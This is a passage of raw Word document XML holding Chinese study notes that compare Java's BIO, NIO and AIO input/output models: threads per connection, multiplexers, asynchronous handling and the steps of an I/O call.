        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>NIO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>AIO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>区别</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00124241" w:rsidRDefault="00773061" w:rsidP="004867CA">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JDK1.7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之前只支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BIO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NIO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JDk1.7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后才开始支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AIO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00773061" w:rsidRDefault="00F464BB" w:rsidP="00F464BB">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF5121">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>同步阻塞</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF5121">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r w:rsidR="00063D78" w:rsidRPr="00BF5121">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF5121">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>BIO</w:t>
      </w:r>
      <w:r w:rsidR="00063D78" w:rsidRPr="00BF5121">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F464BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：同步并阻塞，服务器实现模式为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F464BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>一个连接一个线程</w:t>
      </w:r>
      <w:r w:rsidRPr="00F464BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，即客户端有连接请求时服务器端就需要启动一个线程进行处理，如果这个连接不做任何事情会造成不必要的线程开销，当然可以通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00F464BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>线程池</w:t>
      </w:r>
      <w:r w:rsidRPr="00F464BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>机制改善。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00063D78" w:rsidRDefault="00063D78" w:rsidP="00F464BB">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF5121">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>同步非阻塞</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF5121">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>(NIO)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00063D78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NIO</w:t>
      </w:r>
      <w:r w:rsidRPr="00063D78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的最重要的地方是当一个连接创建后，不需要对应一个线程，</w:t>
      </w:r>
      <w:r w:rsidRPr="009505C7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>这个连接会被注册到多路复用器上面</w:t>
      </w:r>
      <w:r w:rsidRPr="00063D78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，所以所有的连接只需要一个线程就可以搞定，当这个线程</w:t>
      </w:r>
      <w:r w:rsidRPr="00063D78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00063D78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="009505C7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>多路复用器进行轮询的时候，发现连接上有请求的话，才开启一个线程进行处理</w:t>
      </w:r>
      <w:r w:rsidRPr="00063D78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，也就是一个请求一个线程模式。在</w:t>
      </w:r>
      <w:r w:rsidRPr="00063D78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NIO</w:t>
      </w:r>
      <w:r w:rsidRPr="00063D78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的处理方式中，当一个请求来的话，开启线程进行处理，可能会等待后端应用的资源</w:t>
      </w:r>
      <w:r w:rsidRPr="00063D78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(JDBC</w:t>
      </w:r>
      <w:r w:rsidRPr="00063D78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接等</w:t>
      </w:r>
      <w:r w:rsidRPr="00063D78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00063D78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，其实这个线程就被阻塞了，当并发上来的话，还是会有</w:t>
      </w:r>
      <w:r w:rsidRPr="00063D78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BIO</w:t>
      </w:r>
      <w:r w:rsidRPr="00063D78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一样的问题。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E846A4" w:rsidRDefault="00E846A4" w:rsidP="00F464BB">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>异步非阻塞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(AIO)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00E846A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP/1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00E846A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有了</w:t>
      </w:r>
      <w:r w:rsidRPr="00E846A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Http</w:t>
      </w:r>
      <w:r w:rsidRPr="00E846A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>长连接，除了超时和指明特定关闭的</w:t>
      </w:r>
      <w:r w:rsidRPr="00E846A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http header</w:t>
      </w:r>
      <w:r w:rsidRPr="00E846A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>外，这个链接是一直打开的状态的，这样在</w:t>
      </w:r>
      <w:r w:rsidRPr="00E846A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NIO</w:t>
      </w:r>
      <w:r w:rsidRPr="00E846A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处理中可以进一步的进化，在后端资源中可以实现资源池或者队列，当请求来的话，开启的线程把请求和请求数据传送给后端资源池或者队列里面就返回，并且在全局的地方保持住这个现场</w:t>
      </w:r>
      <w:r w:rsidRPr="00E846A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E846A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>哪个连接的哪个请求等</w:t>
      </w:r>
      <w:r w:rsidRPr="00E846A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00E846A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这样前面的线程还是可以去接受其他的请求，</w:t>
      </w:r>
      <w:r w:rsidRPr="00E846A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E846A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而后端的应用的处理只需要执行队列里面的就可以了，这样</w:t>
      </w:r>
      <w:r w:rsidRPr="00794B6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>请求处理和后端应用是异步的</w:t>
      </w:r>
      <w:r w:rsidRPr="00E846A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E846A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当后端处理完，到全局地方得到现场，产生响应，这个就实现了异步处理</w:t>
      </w:r>
      <w:r w:rsidR="00794B6A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00D65E45" w:rsidRPr="00D65E45">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00D65E45" w:rsidRPr="00D65E45">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>异步非阻塞，服务器实现模式为一个有效请求一个线程，客户端的</w:t>
      </w:r>
      <w:r w:rsidR="00D65E45" w:rsidRPr="00D65E45">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>I/O</w:t>
      </w:r>
      <w:r w:rsidR="00D65E45" w:rsidRPr="00D65E45">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>请求都是由</w:t>
      </w:r>
      <w:r w:rsidR="00D65E45" w:rsidRPr="00D65E45">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>OS</w:t>
      </w:r>
      <w:r w:rsidR="00D65E45" w:rsidRPr="00D65E45">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>先完成了再通知服务器应用去启动线程进行处理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F7E29" w:rsidRDefault="003F7E29" w:rsidP="00F464BB">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>所谓</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>AIO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，异步</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，其主要是针对进程在调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>获取外部数据时，是否阻塞调用进程而言的。一个进程的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>调用步骤大致如下：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、进程向操作系统请求数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、操作系统把外部数据加载到内核的缓冲区中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、操作系统把内核的缓冲区拷贝到进程的缓冲区</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>    4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、进程获得数据完成自己的功能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A334B3" w:rsidRPr="00A334B3" w:rsidRDefault="00A334B3" w:rsidP="00A334B3">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A334B3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Io</w:t>
      </w:r>
      <w:r w:rsidRPr="00A334B3">
        <w:rPr>
